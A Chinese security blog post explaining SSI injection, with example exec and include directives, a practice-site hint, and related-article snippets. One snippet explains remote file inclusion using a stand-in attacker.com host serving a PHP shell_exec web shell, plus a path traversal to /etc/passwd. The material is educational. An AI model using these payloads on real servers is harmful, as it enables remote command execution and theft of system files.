关于SSI注入(server side includes injection 服务器端包含注入)

最新推荐文章于 2023-03-29 14:35:39 发布
最新推荐文章于 2023-03-29 14:35:39 发布
阅读量255 收藏
点赞数
文章标签: shell php
原文链接:http://www.cnblogs.com/jokermoon/p/6708691.html
版权

0x01 什么是SSI和SSI注入

     SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执行shell和CGI脚本程序等复杂的功能。SSI 可以称得上是那些资金短缺、时间紧张、工作量大的网站开发人员的最佳帮手。本文将主要结合Apache服务器介绍SSI的使用方法。

     ps:(Server-side Includes) 服务器端包含提供了一种对现有HTML文档增加动态内容的方法。apache和iis都可以通过配置支持SSI,在网页内容被返回给用户之前,服务器会执行网页内容中的SSI标签。在很多场景中,用户输入的内容可以显示在页面中,比如一个存在反射XSS漏洞的页面,如果输入的payload不是xss代码而是ssi的标签,服务器又开启了ssi支持的话就会存在SSI漏洞

 

0x02 SSI注入的条件

    当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令:
    A. Web 服务器已支持 SSI(服务器端包含)。
    B. Web 应用程序在返回 HTML 页面时,嵌入用户输入。
    C. 参数值未进行输入清理。
    例如,如果脚本接收文本输入,供 Web 服务器稍后处理,下列由 SSI 命令组成的输入便会侵害服务器的安全:
    <!--#include file=""...""-->(会显示给定的文件)
    <!--#exec cmd=""...""-->(会执行给定的 shell 命令)

 

0x03 SSI注入常用命令

    https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection

 

0x04 SSI漏洞的防护

    默认apache不开启ssi,ssi这种技术已经比较少用了。如果应用没有使用到ssi,关闭服务器对ssi的支持即可。

 

0x05 SSI注入在线测试

    hackthissite basic mission 8

    https://www.hackthissite.org/missions/basic/8/

    提示:<--!exec cmd="ls ../"-->

转载于:https://www.cnblogs.com/jokermoon/p/6708691.html

孙瑞宇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
20210118bwapp server inject 全难度通关详解
qq_45290991的博客
02-02 1160
这是HTML 注入的姐妹篇,接着这一篇博客之后来的,要看bwapp 的HTML inject 可以参考这篇博客: 20210113bwapp html inject 全难度通关详解 服务端类型的注入,主要包括bwapp的以下几类(不包括SQL注入,打算单独拿出来写): 那我们就从第一个LDAP注入开始吧! 一、LDAP Connection Settings(LDAP inject) 在此之前我没学过LDAP,是从这几个博客学的入门: https://cloud.tencent.com/dev
Server Side Include( SSI )学习
icetime17的专栏
08-03 1509
服务器端嵌入”或者叫“服务器端包含”: 将内容发送到浏览器之前,可以使用“服务器端包含 (SSI)”指令将文本、图形或应用程序信息包含到网页中。   Web 服务器在处理网页的同时处理 SSI 指令。当 Web 服务器遇到 SSI 指令时,直接将包含文件的内容插入 HTML 网页。如果“包含文件”中包含 SSI 指令,则同时插入此文件。除了用于包含文件的基本指令之外,还可以使用 SSI
bWAPP----Server-Side Includes (SSI) Injection
weixin_30556959的博客
07-20 233
Server-Side Includes (SSI) Injection 什么是SSISSI注入 SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执...
ssi(Server Side Includes)介绍
05-27 192
Server Side Includes(SSI) is a simple interpretedserver-side scriptinglanguage used almost exclusively for theWeb. The most frequent use of SSI is to include the contents of one or more file...
bWAPP--SSI Injection
hee_mee的博客
09-18 273
zeroNIl
跟bWAPP学WEB安全(PHP代码)--SSL(Server-Side-Include)漏洞
weixin_30783913的博客
01-09 183
什么是Server-Side-Include漏洞 服务端包含漏洞是指发送指令到服务器,服务器会将指令运行完,把运行结果包含在返回文件中发送给你。利用这种漏洞可以获取服务端的信息甚至执行命令,这样的指令是构造在HTML注释中发过去的。当然,因为包含SSI指令的文件要求特殊处理,所以必须为所有SSI文件赋予 SSI文件扩展名。默认扩展名是 .stm、.shtm和 .shtml。 指令类型 显示服...
服务器端包含、嵌入技术SSIServer SideInc lude)详解
09-15
服务器端包含、嵌入技术SSIServer Side Include)是一种在静态网页中动态组合内容的技术,它允许网页开发者在HTML文件中插入服务器端的脚本,从而实现动态更新和个性化定制。这种技术尤其适用于大型网站,因为可以...
ssi-express-server:简单服务器可以通过Server Side Includes提供静态内容和html文件
05-06
Server Side IncludesSSI)是一种在Web服务器端动态插入内容的技术,主要用于简化静态网页的更新过程。在JavaScript的世界里,Express.js是广泛使用的Web应用框架,它允许开发者构建高效、灵活的HTTP服务器。本篇...
SSI.zip_SSI_SSI Injection代码
09-22
提供的"SSI.zip"文件包含了关于SSI整合的案例,其中的"SSI.doc"文档可能详细阐述了如何在实际项目中使用SSI,包括如何设置SSI、编写包含指令、处理用户输入以及如何防止注入攻击等方面。阅读这个文档可以帮助你理解...
Apache、Nginx 服务配置服务器端包含SSI
01-10
如果不知道什么是服务器端包含ssi)点击后面的链接查看:http://lamp.linux.gov.cn/Apache/ApacheMenu/howto/ssi.html 一、Apache 配置SSI功能 修改Apache配置文件httpd.conf 1. 确认加载include.so模块,将注释...
SSI注入漏洞
Hydra的博客
11-19 9373
SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是...
SSI注入 + [BJDCTF2020]EasySearch writeup
ShenZ的博客
09-08 277
SSI注入 全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 页面中有一小部分是动态输出的时候使用SSI,比如: 文件相关的属性字段 当前时间 访客IP 调用CGI程序 SSI语法 SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。 ①显示
CTF-SSI注入
su__xiaoyan的博客
12-25 299
SSI注入 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于CGI,用于执行动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。 从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码
buu(ssti模板注入、ssrf服务器请求伪造)
qq_62046696的博客
08-19 788
搜索一下,shtml的信息,补充一下什么是ssi注入SSI 注入全称Server-Side Includes Injection(服务端包含注入),ssi可以赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,当在网站目录中发现了.stm .shtm .shtml或在界面中发现了。到这分析结束,我们只要绕过checkSign,让返回的值相同就可以了,可是secret这个密钥我们不知道值呀,仔细看第一个目录就可以明白。打开界面源码,什么都没有发现,试一下万能密码之类的登录,只返回fail。.
SSI,什么是SSI服务端包含技术?如何在nginx虚拟主机中开通SSI
WangqinqinA的博客
04-16 322
1、页面内容多如何管理? 将页面拆分成一个一个的小页面,通过cms去管理这些小页面,当要更改部分页面内容时只需要更改具体某个小页 面即可。 2、页面拆出来怎么样通过web服务浏览呢? 使用web服务(例如nginx)的SSI技术,将多个子页面合并渲染输出。 3、SSI是什么? ssi包含类似于jsp页面中的incluce指令,ssi是在web服务端将include指定 的页面包含在网页中,渲染ht...
服务器端包含程序(SSI, Server Side Include)——shtml教程(2)
happmaoo的专栏
05-21 178
shtml shtml教程SSI有什么用? 之所以要扯到ssi,是因爲shtml--server-parsed HTML 的首字母缩略词。包含有嵌入式服务器方包含命令的 HTML 文本。在被传送给浏览器之前,服务器会对 SHTML 文档进行完全地读取、分析以及修改。 shtml和asp 有一些相似,以shtml命名的文件里,使用了ssi的一些指令,就像asp中的指令,你可以在SHTML文件中...
CTF之Web安全SSI注入
小王的储物间
03-29 384
SSI(server side inject)的出现是为了赋予HTML静态页面动态的效果,通过SSI来执行系统命令;并返回对应的结果。如果再网站目录中发现了.stm;.shtm;.shtml;这样的文件后缀名,并且网站对于SSI的输入没有做到严格过滤或者过滤不充分;很有可能被SSI注入攻击。对于SSI漏洞服务器有很多过滤机制,需要进行绕过,比如大小写。防御措施:一、进行过滤,过滤这些语法中的特殊字符二、关闭服务器SSI相关功能。
SSTI模板注入
qq_48904485的博客
03-22 5014
一、SSTI简介 SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到
SSI漏洞注入
weixin_45007073的博客
01-04 907
在进行SSI漏洞注入之前,先介绍一下什么是SSI漏洞。 SSI 注入全称Server-Side Includes Injection,即服务端包含注入SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 准备工作 靶机地址: 链接:https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA 提取码:x3c2 漏洞复现过程 使用netdiscover发现存活主机 netdidscover -i eth0 使用n
服务器端文件包含,btslab全攻略——注入之远程文件包含&服务器端包含
最新发布
05-22
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值